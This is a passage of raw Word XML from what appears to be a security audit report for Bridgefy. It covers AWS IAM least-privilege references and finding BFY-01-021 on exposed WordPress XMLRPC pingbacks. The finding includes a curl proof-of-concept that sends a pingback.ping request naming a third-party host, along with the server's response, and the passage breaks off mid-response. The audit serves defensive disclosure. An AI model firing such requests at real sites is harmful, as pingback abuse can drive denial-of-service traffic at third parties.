      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="68"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId194">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html#grant-least-privilege</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>126</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="61"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId195">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_generate-policy.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId196">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-policy-generation.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>access, less privileged roles should then be defined, matching operations performed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by external parties, and limiting administrative access to the minimum number of users. Once all this is done, the CI/CD pipeline should be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reviewed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>potential for abuse and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that it is further suggested</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>extrapolate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to all other Bridgefy AWS accounts that were out of scope during this assignment, as it is likely they are affected by similar weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>XMLRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PingBack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the default WordPress XMLRPC interface is currently exposed to the Internet. This makes the server more prone to a number of well-known attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as DDoS. This issue was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -X POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://bridgefy.me/xmlrpc.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'&lt;methodCall&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;methodName&gt;pingback.ping&lt;/methodName&gt; &lt;params&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;value&gt;&lt;string&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://7as.es</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/string&gt;&lt;/value&gt; &lt;/param&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;value&gt;&lt;string&gt;https://knowledge.anbtx.com/family-finances/life-events/article/estate-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lanning&lt;/string&gt;&lt;/value&gt; &lt;/param&gt; &lt;/params&gt; &lt;/methodCall&gt;' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Safari/537.36'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xml version=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"1.0" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>encoding=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"UTF-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>methodResponse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="917" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1709" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;faultCode&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1709" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;0&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
